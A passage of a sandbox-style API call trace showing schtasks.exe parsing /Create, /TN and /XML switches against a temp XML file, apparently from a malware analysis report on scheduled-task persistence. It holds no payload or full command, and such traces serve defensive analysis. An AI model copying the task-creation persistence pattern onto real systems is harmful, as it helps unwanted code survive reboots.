SetLastError (dwErrCode=0x490) [0183.331] lstrlenW (lpString="change") returned 6 [0183.331] lstrlenW (lpString="change") returned 6 [0183.332] _memicmp (_Buf1=0x184c60, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.332] lstrlenW (lpString="XML") returned 3 [0183.332] _memicmp (_Buf1=0x184c90, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.332] _vsnwprintf (in: _Buffer=0x1852e8, _BufferCount=0x9, _Format="|%s|", _ArgList=0x12f4b0 | out: _Buffer="|change|") returned 8 [0183.332] _vsnwprintf (in: _Buffer=0x1852a8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x12f4b0 | out: _Buffer="|XML|") returned 5 [0183.332] lstrlenW (lpString="|change|") returned 8 [0183.332] lstrlenW (lpString="|XML|") returned 5 [0183.332] StrStrIW (lpFirst="|change|", lpSrch="|XML|") returned 0x0 [0183.332] SetLastError (dwErrCode=0x490) [0183.332] lstrlenW (lpString="run") returned 3 [0183.332] lstrlenW (lpString="run") returned 3 [0183.332] _memicmp (_Buf1=0x184c60, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.332] lstrlenW (lpString="XML") returned 3 [0183.332] _memicmp (_Buf1=0x184c90, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.332] _vsnwprintf (in: _Buffer=0x1852e8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x12f4b0 | out: _Buffer="|run|") returned 5 [0183.332] _vsnwprintf (in: _Buffer=0x1852a8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x12f4b0 | out: _Buffer="|XML|") returned 5 [0183.332] lstrlenW (lpString="|run|") returned 5 [0183.332] lstrlenW (lpString="|XML|") returned 5 [0183.332] StrStrIW (lpFirst="|run|", lpSrch="|XML|") returned 0x0 [0183.332] SetLastError (dwErrCode=0x490) [0183.332] lstrlenW (lpString="end") returned 3 [0183.332] lstrlenW (lpString="end") returned 3 [0183.332] _memicmp (_Buf1=0x184c60, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.332] lstrlenW (lpString="XML") returned 3 [0183.333] _memicmp (_Buf1=0x184c90, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.333] _vsnwprintf (in: _Buffer=0x1852e8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x12f4b0 | out: _Buffer="|end|") returned 5 [0183.333] _vsnwprintf (in: _Buffer=0x1852a8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x12f4b0 | out: _Buffer="|XML|") returned 5 [0183.333] lstrlenW (lpString="|end|") returned 5 [0183.333] lstrlenW (lpString="|XML|") returned 5 [0183.333] StrStrIW (lpFirst="|end|", lpSrch="|XML|") returned 0x0 [0183.333] SetLastError (dwErrCode=0x490) [0183.333] lstrlenW (lpString="showsid") returned 7 [0183.333] lstrlenW (lpString="showsid") returned 7 [0183.333] _memicmp (_Buf1=0x184c60, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.333] lstrlenW (lpString="XML") returned 3 [0183.333] _memicmp (_Buf1=0x184c90, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.333] _vsnwprintf (in: _Buffer=0x1852e8, _BufferCount=0xa, _Format="|%s|", _ArgList=0x12f4b0 | out: _Buffer="|showsid|") returned 9 [0183.333] _vsnwprintf (in: _Buffer=0x1852a8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x12f4b0 | out: _Buffer="|XML|") returned 5 [0183.333] lstrlenW (lpString="|showsid|") returned 9 [0183.333] lstrlenW (lpString="|XML|") returned 5 [0183.333] StrStrIW (lpFirst="|showsid|", lpSrch="|XML|") returned 0x0 [0183.333] SetLastError (dwErrCode=0x490) [0183.333] SetLastError (dwErrCode=0x490) [0183.333] SetLastError (dwErrCode=0x0) [0183.333] lstrlenW (lpString="/XML") returned 4 [0183.333] StrChrIW (lpStart="/XML", wMatch=0x3a) returned 0x0 [0183.333] SetLastError (dwErrCode=0x490) [0183.333] SetLastError (dwErrCode=0x0) [0183.333] lstrlenW (lpString="/XML") returned 4 [0183.333] GetProcessHeap () returned 0x170000 [0183.333] RtlAllocateHeap (HeapHandle=0x170000, Flags=0xc, Size=0xa) returned 0x184c78 [0183.334] GetProcessHeap () returned 0x170000 [0183.334] RtlAllocateHeap (HeapHandle=0x170000, Flags=0xc, Size=0x14) returned 0x185328 [0183.334] SetLastError (dwErrCode=0x0) [0183.334] SetLastError (dwErrCode=0x0) [0183.334] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tmp1B7B.tmp") returned 60 [0183.334] lstrlenW (lpString="-/") returned 2 [0183.334] StrChrIW (lpStart="-/", wMatch=0x43) returned 0x0 [0183.334] SetLastError (dwErrCode=0x490) [0183.334] SetLastError (dwErrCode=0x490) [0183.334] SetLastError (dwErrCode=0x0) [0183.334] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tmp1B7B.tmp") returned 60 [0183.334] StrChrIW (lpStart="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tmp1B7B.tmp", wMatch=0x3a) returned=":\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tmp1B7B.tmp" [0183.334] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tmp1B7B.tmp") returned 60 [0183.334] GetProcessHeap () returned 0x170000 [0183.334] RtlAllocateHeap (HeapHandle=0x170000, Flags=0xc, Size=0x10) returned 0x184ca8 [0183.334] _memicmp (_Buf1=0x184ca8, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.334] GetProcessHeap () returned 0x170000 [0183.334] RtlAllocateHeap (HeapHandle=0x170000, Flags=0xc, Size=0xc) returned 0x184cc0 [0183.334] GetProcessHeap () returned 0x170000 [0183.334] RtlAllocateHeap (HeapHandle=0x170000, Flags=0xc, Size=0x10) returned 0x184cd8 [0183.334] _memicmp (_Buf1=0x184cd8, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.334] GetProcessHeap () returned 0x170000 [0183.334] RtlAllocateHeap (HeapHandle=0x170000, Flags=0xc, Size=0x7e) returned 0x186928 [0183.334] SetLastError (dwErrCode=0x7a) [0183.334] SetLastError (dwErrCode=0x0) [0183.334] SetLastError (dwErrCode=0x0) [0183.334] lstrlenW (lpString="C") returned 1 [0183.334] SetLastError (dwErrCode=0x490) [0183.334] SetLastError (dwErrCode=0x0) [0183.334] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tmp1B7B.tmp") returned 60 [0183.335] GetProcessHeap () returned 0x170000 [0183.335] RtlAllocateHeap (HeapHandle=0x170000, Flags=0xc, Size=0x7a) returned 0x1869b0 [0183.335] GetProcessHeap () returned 0x170000 [0183.335] RtlAllocateHeap (HeapHandle=0x170000, Flags=0xc, Size=0x14) returned 0x185348 [0183.335] SetLastError (dwErrCode=0x0) [0183.335] GetProcessHeap () returned 0x170000 [0183.335] GetProcessHeap () returned 0x170000 [0183.335] HeapValidate (hHeap=0x170000, dwFlags=0x0, lpMem=0x1868e8) returned 1 [0183.335] GetProcessHeap () returned 0x170000 [0183.335] RtlSizeHeap (HeapHandle=0x170000, Flags=0x0, MemoryPointer=0x1868e8) returned 0x8 [0183.335] HeapFree (in: hHeap=0x170000, dwFlags=0x0, lpMem=0x1868e8 | out: hHeap=0x170000) returned 1 [0183.335] GetProcessHeap () returned 0x170000 [0183.335] GetProcessHeap () returned 0x170000 [0183.335] HeapValidate (hHeap=0x170000, dwFlags=0x0, lpMem=0x1852c8) returned 1 [0183.335] GetProcessHeap () returned 0x170000 [0183.335] RtlSizeHeap (HeapHandle=0x170000, Flags=0x0, MemoryPointer=0x1852c8) returned 0x14 [0183.335] HeapFree (in: hHeap=0x170000, dwFlags=0x0, lpMem=0x1852c8 | out: hHeap=0x170000) returned 1 [0183.335] GetProcessHeap () returned 0x170000 [0183.335] GetProcessHeap () returned 0x170000 [0183.335] HeapValidate (hHeap=0x170000, dwFlags=0x0, lpMem=0x1868f8) returned 1 [0183.335] GetProcessHeap () returned 0x170000 [0183.335] RtlSizeHeap (HeapHandle=0x170000, Flags=0x0, MemoryPointer=0x1868f8) returned 0x26 [0183.335] HeapFree (in: hHeap=0x170000, dwFlags=0x0, lpMem=0x1868f8 | out: hHeap=0x170000) returned 1 [0183.335] GetProcessHeap () returned 0x170000 [0183.335] GetProcessHeap () returned 0x170000 [0183.335] HeapValidate (hHeap=0x170000, dwFlags=0x0, lpMem=0x185308) returned 1 [0183.335] GetProcessHeap () returned 0x170000 [0183.335] RtlSizeHeap (HeapHandle=0x170000, Flags=0x0, MemoryPointer=0x185308) returned 0x14 [0183.335] HeapFree (in: hHeap=0x170000, dwFlags=0x0, lpMem=0x185308 | out: hHeap=0x170000) returned 1 [0183.336] GetProcessHeap () returned 0x170000 [0183.336] GetProcessHeap () returned 0x170000 [0183.336] HeapValidate (hHeap=0x170000, dwFlags=0x0, lpMem=0x184c78) returned 1 [0183.336] GetProcessHeap () returned 0x170000 [0183.336] RtlSizeHeap (HeapHandle=0x170000, Flags=0x0, MemoryPointer=0x184c78) returned 0xa [0183.336] HeapFree (in: hHeap=0x170000, dwFlags=0x0, lpMem=0x184c78 | out: hHeap=0x170000) returned 1 [0183.336] GetProcessHeap () returned 0x170000 [0183.336] GetProcessHeap () returned 0x170000 [0183.336] HeapValidate (hHeap=0x170000, dwFlags=0x0, lpMem=0x185328) returned 1 [0183.336] GetProcessHeap () returned 0x170000 [0183.336] RtlSizeHeap (HeapHandle=0x170000, Flags=0x0, MemoryPointer=0x185328) returned 0x14 [0183.336] HeapFree (in: hHeap=0x170000, dwFlags=0x0, lpMem=0x185328 | out: hHeap=0x170000) returned 1 [0183.336] GetProcessHeap () returned 0x170000 [0183.336] GetProcessHeap () returned 0x170000 [0183.336] HeapValidate (hHeap=0x170000, dwFlags=0x0, lpMem=0x1869b0) returned 1 [0183.336] GetProcessHeap () returned 0x170000 [0183.336] RtlSizeHeap (HeapHandle=0x170000, Flags=0x0, MemoryPointer=0x1869b0) returned 0x7a [0183.336] HeapFree (in: hHeap=0x170000, dwFlags=0x0, lpMem=0x1869b0 | out: hHeap=0x170000) returned 1 [0183.336] GetProcessHeap () returned 0x170000 [0183.336] GetProcessHeap () returned 0x170000 [0183.336] HeapValidate (hHeap=0x170000, dwFlags=0x0, lpMem=0x185348) returned 1 [0183.336] GetProcessHeap () returned 0x170000 [0183.336] RtlSizeHeap (HeapHandle=0x170000, Flags=0x0, MemoryPointer=0x185348) returned 0x14 [0183.336] HeapFree (in: hHeap=0x170000, dwFlags=0x0, lpMem=0x185348 | out: hHeap=0x170000) returned 1 [0183.336] GetProcessHeap () returned 0x170000 [0183.336] GetProcessHeap () returned 0x170000 [0183.336] HeapValidate (hHeap=0x170000, dwFlags=0x0, lpMem=0x184b58) returned 1 [0183.336] GetProcessHeap () returned 0x170000 [0183.336] RtlSizeHeap (HeapHandle=0x170000, Flags=0x0, MemoryPointer=0x184b58) returned 0x10 [0183.337] HeapFree (in: hHeap=0x170000, dwFlags=0x0, lpMem=0x184b58 | out: hHeap=0x170000) returned 1 [0183.337] SetLastError (dwErrCode=0x0) [0183.337] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18 [0183.337] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b [0183.337] VerSetConditionMask (ConditionMask=0x1b, TypeMask=0x80000000, Condition=0x20) returned 0x1801b [0183.337] VerifyVersionInfoW (in: lpVersionInformation=0x12c8c8, dwTypeMask=0x3, dwlConditionMask=0x1801b | out: lpVersionInformation=0x12c8c8) returned 1 [0183.337] SetLastError (dwErrCode=0x0) [0183.337] lstrlenW (lpString="create") returned 6 [0183.337] StrChrIW (lpStart="create", wMatch=0x7c) returned 0x0 [0183.337] SetLastError (dwErrCode=0x490) [0183.337] SetLastError (dwErrCode=0x0) [0183.337] lstrlenW (lpString="create") returned 6 [0183.337] GetProcessHeap () returned 0x170000 [0183.337] RtlAllocateHeap (HeapHandle=0x170000, Flags=0xc, Size=0x14) returned 0x185348 [0183.337] GetProcessHeap () returned 0x170000 [0183.337] RtlAllocateHeap (HeapHandle=0x170000, Flags=0xc, Size=0x10) returned 0x184b58 [0183.337] _memicmp (_Buf1=0x184b58, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.337] GetProcessHeap () returned 0x170000 [0183.337] RtlAllocateHeap (HeapHandle=0x170000, Flags=0xc, Size=0x16) returned 0x185328 [0183.338] SetLastError (dwErrCode=0x0) [0183.338] _memicmp (_Buf1=0x184bd0, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.338] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x185a10, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\schtasks.exe" (normalized: "c:\\windows\\syswow64\\schtasks.exe")) returned 0x20 [0183.338] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", lpdwHandle=0x0 | out: lpdwHandle=0x0) returned 0x744 [0183.338] GetProcessHeap () returned 0x170000 [0183.338] RtlAllocateHeap (HeapHandle=0x170000, Flags=0xc, Size=0x74e) returned 0x185c20 [0183.338] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", dwHandle=0x0, dwLen=0x74e, lpData=0x185c20 | out: lpData=0x185c20) returned 1 [0183.338] VerQueryValueW (in: pBlock=0x185c20, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x12c9d0, puLen=0x12c9d4 | out: lplpBuffer=0x12c9d0*=0x185fbc, puLen=0x12c9d4) returned 1 [0183.338] _memicmp (_Buf1=0x184bd0, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.338] _vsnwprintf (in: _Buffer=0x185a10, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0x12c9b8 | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37 [0183.338] VerQueryValueW (in: pBlock=0x185c20, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0x12c9e0, puLen=0x12c9dc | out: lplpBuffer=0x12c9e0*=0x185de8, puLen=0x12c9dc) returned 1 [0183.339] lstrlenW (lpString="schtasks.exe") returned 12 [0183.339] lstrlenW (lpString="schtasks.exe") returned 12 [0183.339] lstrlenW (lpString=".EXE") returned 4 [0183.339] StrStrIW (lpFirst="schtasks.exe", lpSrch=".EXE") returned=".exe" [0183.339] lstrlenW (lpString="schtasks.exe") returned 12 [0183.339] lstrlenW (lpString=".EXE") returned 4 [0183.339] lstrlenW (lpString="schtasks") returned 8 [0183.339] lstrlenW (lpString="/create") returned 7 [0183.339] _memicmp (_Buf1=0x184bd0, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.339] _vsnwprintf (in: _Buffer=0x185a10, _BufferCount=0x19, _Format="%s %s", _ArgList=0x12c9b8 | out: _Buffer="schtasks /create") returned 16 [0183.339] _memicmp (_Buf1=0x184c30, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.339] GetProcessHeap () returned 0x170000 [0183.339] RtlAllocateHeap (HeapHandle=0x170000, Flags=0xc, Size=0x14) returned 0x185308 [0183.339] _memicmp (_Buf1=0x184c48, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.339] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x1866a8, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17 [0183.339] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23 [0183.339] GetProcessHeap () returned 0x170000 [0183.339] RtlAllocateHeap (HeapHandle=0x170000, Flags=0xc, Size=0x30) returned 0x1868e8 [0183.339] _vsnwprintf (in: _Buffer=0x186600, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0x12c9bc | out: _Buffer="Type \"SCHTASKS /CREATE /?\" for usage.") returned 37 [0183.339] GetProcessHeap () returned 0x170000 [0183.339] GetProcessHeap () returned 0x170000 [0183.339] HeapValidate (hHeap=0x170000, dwFlags=0x0, lpMem=0x185c20) returned 1 [0183.339] GetProcessHeap () returned 0x170000 [0183.339] RtlSizeHeap (HeapHandle=0x170000, Flags=0x0, MemoryPointer=0x185c20) returned 0x74e [0183.339] HeapFree (in: hHeap=0x170000, dwFlags=0x0, lpMem=0x185c20 | out: hHeap=0x170000) returned 1 [0183.340] SetLastError (dwErrCode=0x0) [0183.340] GetThreadLocale () returned 0x409 [0183.340] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0183.340] lstrlenW (lpString="create") returned 6 [0183.340] GetThreadLocale () returned 0x409 [0183.340] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0183.340] lstrlenW (lpString="?") returned 1 [0183.340] GetThreadLocale () returned 0x409 [0183.340] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0183.340] lstrlenW (lpString="s") returned 1 [0183.340] GetThreadLocale () returned 0x409 [0183.340] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0183.340] lstrlenW (lpString="u") returned 1 [0183.340] GetThreadLocale () returned 0x409 [0183.340] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0183.340] lstrlenW (lpString="p") returned 1 [0183.340] GetThreadLocale () returned 0x409 [0183.340] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0183.340] lstrlenW (lpString="ru") returned 2 [0183.340] GetThreadLocale () returned 0x409 [0183.340] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0183.340] lstrlenW (lpString="rp") returned 2 [0183.340] GetThreadLocale () returned 0x409 [0183.340] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0183.340] lstrlenW (lpString="sc") returned 2 [0183.340] GetThreadLocale () returned 0x409 [0183.340] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0183.340] lstrlenW (lpString="mo") returned 2 [0183.340] GetThreadLocale () returned 0x409 [0183.341] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0183.341] lstrlenW (lpString="d") returned 1 [0183.341] GetThreadLocale () returned 0x409 [0183.341] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0183.341] lstrlenW (lpString="m") returned 1 [0183.341] GetThreadLocale () returned 0x409 [0183.341] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0183.341] lstrlenW (lpString="i") returned 1 [0183.341] GetThreadLocale () returned 0x409 [0183.341] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0183.341] lstrlenW (lpString="tn") returned 2 [0183.341] GetThreadLocale () returned 0x409 [0183.341] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0183.341] lstrlenW (lpString="tr") returned 2 [0183.341] GetThreadLocale () returned 0x409 [0183.341] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0183.341] lstrlenW (lpString="st") returned 2 [0183.341] GetThreadLocale () returned 0x409 [0183.341] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0183.341] lstrlenW (lpString="sd") returned 2 [0183.341] GetThreadLocale () returned 0x409 [0183.341] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0183.341] lstrlenW (lpString="ed") returned 2 [0183.341] GetThreadLocale () returned 0x409 [0183.341] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0183.341] lstrlenW (lpString="it") returned 2 [0183.341] GetThreadLocale () returned 0x409 [0183.341] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0183.341] lstrlenW (lpString="et") returned 2 [0183.341] GetThreadLocale () returned 0x409 [0183.341] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0183.342] lstrlenW (lpString="k") returned 1 [0183.342] GetThreadLocale () returned 0x409 [0183.342] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0183.342] lstrlenW (lpString="du") returned 2 [0183.342] GetThreadLocale () returned 0x409 [0183.342] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0183.342] lstrlenW (lpString="ri") returned 2 [0183.342] GetThreadLocale () returned 0x409 [0183.342] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0183.342] lstrlenW (lpString="z") returned 1 [0183.342] GetThreadLocale () returned 0x409 [0183.342] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0183.342] lstrlenW (lpString="f") returned 1 [0183.342] GetThreadLocale () returned 0x409 [0183.342] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0183.342] lstrlenW (lpString="v1") returned 2 [0183.342] GetThreadLocale () returned 0x409 [0183.342] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0183.342] lstrlenW (lpString="xml") returned 3 [0183.342] GetThreadLocale () returned 0x409 [0183.342] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0183.342] lstrlenW (lpString="ec") returned 2 [0183.342] GetThreadLocale () returned 0x409 [0183.342] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0183.342] lstrlenW (lpString="rl") returned 2 [0183.342] GetThreadLocale () returned 0x409 [0183.342] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0183.342] lstrlenW (lpString="delay") returned 5 [0183.342] GetThreadLocale () returned 0x409 [0183.343] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0183.343] lstrlenW (lpString="np") returned 2 [0183.343] SetLastError (dwErrCode=0x0) [0183.343] SetLastError (dwErrCode=0x0) [0183.343] lstrlenW (lpString="/Create") returned 7 [0183.343] lstrlenW (lpString="-/") returned 2 [0183.343] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0183.343] lstrlenW (lpString="create") returned 6 [0183.343] lstrlenW (lpString="create") returned 6 [0183.343] _memicmp (_Buf1=0x184c60, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.343] lstrlenW (lpString="Create") returned 6 [0183.343] _memicmp (_Buf1=0x184c90, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.343] _vsnwprintf (in: _Buffer=0x1852e8, _BufferCount=0x9, _Format="|%s|", _ArgList=0x12c9a4 | out: _Buffer="|create|") returned 8 [0183.343] _vsnwprintf (in: _Buffer=0x1852a8, _BufferCount=0x9, _Format="|%s|", _ArgList=0x12c9a4 | out: _Buffer="|Create|") returned 8 [0183.343] lstrlenW (lpString="|create|") returned 8 [0183.343] lstrlenW (lpString="|Create|") returned 8 [0183.343] StrStrIW (lpFirst="|create|", lpSrch="|Create|") returned="|create|" [0183.343] SetLastError (dwErrCode=0x0) [0183.343] SetLastError (dwErrCode=0x0) [0183.343] SetLastError (dwErrCode=0x0) [0183.343] lstrlenW (lpString="/TN") returned 3 [0183.343] lstrlenW (lpString="-/") returned 2 [0183.343] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0183.343] lstrlenW (lpString="create") returned 6 [0183.343] lstrlenW (lpString="create") returned 6 [0183.343] _memicmp (_Buf1=0x184c60, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.343] lstrlenW (lpString="TN") returned 2 [0183.344] _memicmp (_Buf1=0x184c90, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.344] _vsnwprintf (in: _Buffer=0x1852e8, _BufferCount=0x9, _Format="|%s|", _ArgList=0x12c9a4 | out: _Buffer="|create|") returned 8 [0183.344] _vsnwprintf (in: _Buffer=0x1852a8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12c9a4 | out: _Buffer="|TN|") returned 4 [0183.344] lstrlenW (lpString="|create|") returned 8 [0183.344] lstrlenW (lpString="|TN|") returned 4 [0183.344] StrStrIW (lpFirst="|create|", lpSrch="|TN|") returned 0x0 [0183.344] SetLastError (dwErrCode=0x490) [0183.344] lstrlenW (lpString="?") returned 1 [0183.344] lstrlenW (lpString="?") returned 1 [0183.344] _memicmp (_Buf1=0x184c60, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.344] lstrlenW (lpString="TN") returned 2 [0183.344] _memicmp (_Buf1=0x184c90, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.344] _vsnwprintf (in: _Buffer=0x1852e8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x12c9a4 | out: _Buffer="|?|") returned 3 [0183.344] _vsnwprintf (in: _Buffer=0x1852a8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12c9a4 | out: _Buffer="|TN|") returned 4 [0183.344] lstrlenW (lpString="|?|") returned 3 [0183.344] lstrlenW (lpString="|TN|") returned 4 [0183.344] SetLastError (dwErrCode=0x490) [0183.344] lstrlenW (lpString="s") returned 1 [0183.344] lstrlenW (lpString="s") returned 1 [0183.344] _memicmp (_Buf1=0x184c60, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.344] lstrlenW (lpString="TN") returned 2 [0183.344] _memicmp (_Buf1=0x184c90, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.344] _vsnwprintf (in: _Buffer=0x1852e8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x12c9a4 | out: _Buffer="|s|") returned 3 [0183.344] _vsnwprintf (in: _Buffer=0x1852a8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12c9a4 | out: _Buffer="|TN|") returned 4 [0183.344] lstrlenW (lpString="|s|") returned 3 [0183.345] lstrlenW (lpString="|TN|") returned 4 [0183.345] SetLastError (dwErrCode=0x490) [0183.345] lstrlenW (lpString="u") returned 1 [0183.345] lstrlenW (lpString="u") returned 1 [0183.345] _memicmp (_Buf1=0x184c60, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.345] lstrlenW (lpString="TN") returned 2 [0183.345] _memicmp (_Buf1=0x184c90, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.345] _vsnwprintf (in: _Buffer=0x1852e8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x12c9a4 | out: _Buffer="|u|") returned 3 [0183.345] _vsnwprintf (in: _Buffer=0x1852a8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12c9a4 | out: _Buffer="|TN|") returned 4 [0183.345] lstrlenW (lpString="|u|") returned 3 [0183.345] lstrlenW (lpString="|TN|") returned 4 [0183.345] SetLastError (dwErrCode=0x490) [0183.345] lstrlenW (lpString="p") returned 1 [0183.345] lstrlenW (lpString="p") returned 1 [0183.345] _memicmp (_Buf1=0x184c60, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.345] lstrlenW (lpString="TN") returned 2 [0183.345] _memicmp (_Buf1=0x184c90, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.345] _vsnwprintf (in: _Buffer=0x1852e8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x12c9a4 | out: _Buffer="|p|") returned 3 [0183.345] _vsnwprintf (in: _Buffer=0x1852a8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12c9a4 | out: _Buffer="|TN|") returned 4 [0183.345] lstrlenW (lpString="|p|") returned 3 [0183.345] lstrlenW (lpString="|TN|") returned 4 [0183.345] SetLastError (dwErrCode=0x490) [0183.345] lstrlenW (lpString="ru") returned 2 